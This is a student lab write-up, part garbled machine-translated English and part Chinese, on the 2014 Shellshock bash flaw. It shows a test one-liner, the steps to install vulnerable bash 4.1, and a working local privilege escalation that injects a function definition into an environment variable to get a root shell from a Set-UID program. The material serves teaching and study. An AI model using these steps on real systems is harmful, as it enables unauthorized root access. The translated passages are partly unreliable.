ShellShock challenge experiments
I. Introduction experiment
September 24, 2014, Bash found a serious flaw shellshock, the vulnerability can be used in many systems, and can also be triggered remotely either locally
Second, prior knowledge
1.shellshock Introduction
Shellshock, also known as Bashdoor, is a security vulnerability Bash shell widely used in Unix is, for the first time on September 24, 2014 open. Many Internet daemons, such as web servers, using bash to process certain commands, allowing an attacker to execute arbitrary code on the vulnerable version of Bash. This can be exploited to access the computer system without authorization.
2. environment to build
Install version 4.1 bash with root privileges (at least version 4.2 of the holes have been plugged)
$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
Once downloaded, install it
$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure
$ make && make install
link
$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash
After the installation is complete, the next loophole detect the presence of shellshock
$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
Finally, let / bin / sh points to / bin / bash.
$ sudo ln -sf /bin/bash /bin/sh
3. With regard to bash some prior knowledge, etc.
Learn bash custom function, the function name will only be able to call the function.
$ foo() { echo bar; }
$ foo
> barThis time the Bash environment variables:
KEY = foo
VALUE = () { echo bar; }Take a look at the vulnerability of Mami ShellShock:
export foo='() { :; }; echo Hello World'
bash
>Hello WorldWhy call bash when the output Hello World of it? Look at the situation he's inside:
KEY = foo
VALUE = () { :; }; echo Hello Worldbash reads the environment variable, after defining a function foo directly call back. Once bash calling, custom statements directly trigger.
Third, the experimental content attack Set-UID program
1. In this study, we used to gain root privileges by attacking the Set-UID program. We know the system () function will be called "/ bin / sh -c" to run the specified command, this also means that / bin / bash is called, you can take advantage of loopholes to get permission shellshock it? First, make sure you have bash version with loopholes, and make / bin / sh points to / bin / bash.
$ sudo ln -sf /bin/bash /bin/sh2. Create a new file shock.c / home under / shiyanlou directory and enter the following code
#include <stdio.h>
void main()
{
setuid(geteuid()); // make real uid = effective uid.
system("/bin/ls -l");
}
3.编译这段代码,并设置其为Set-UID程序,保证它的所有者是root。(我们注意到这里使用了setuid(geteuid()) 来使real uid = effective uid,这在Set-UID程序中不是普遍现象,但它确实有时会发生)
$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock
4.以下是shack过程
$ exit
$ export foo='() { :; }; bash'
$ ./shock
5.如果 setuid(geteuid()) 语句被去掉了,再试试看攻击,我们还能够拿到权限么?
#include <stdio.h>
void main()
{
system("/bin/ls -l");
}$ sudo su
$ gcc -o sh0ck shock.c
$ chmod u+s sh0ck
$ ls -il sh0ck
$ exit
$ ./sh0ck
失败了!这就说明如果 real uid 和 effective uid 相同的话,定义在环境变量中的内容在该程序内有效,那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话,环境变量失效,就无法发动攻击了,这可以从 bash的源代码中得到印证(variables.c,在308到369行之间)请指出是哪一行导致了这样的不同,并说明bash这样设计的原因。以下给出精简后的代码:
void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {
/*...*/
/* 如果有export过的函数, 在这里定义 */
/* 无法导入在特权模式下(root下)定义的函数 */
if (privmode == 0 && read_but_dont_execute == 0 &&
STREQN (“() {“, string, 4)) {
[...]
// 这里是shellshock发生的地方
// 传递函数定义 + 运行额外的指令
parse_and_execute (temp_string, name,
SEVAL_NONINT|SEVAL_NOHIST);
[...]
} }就是上述那一行判断逻辑导致了两者的不同,primode即私有模式,要求real uid 与 effective uid保持一致。
四、实验困难
问题:编译遇到系统报错。
解决:代码编写错误,改正后即可正常运行。
五、实验体会
本次实验相比于前两次实验长度略短,操作简单,但是更具有实际应用性。
Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。shellshock漏洞可用于许多系统,并且既可以远程也可以在本地触发,在本实验中,我们亲手重现攻击来理解该漏洞。那样shellshock漏洞就能够被利用了,但是如果两个uid不同的话,环境变量失效,就无法发动攻击了。在实验中也出现一些失误处,经过改正顺利解决。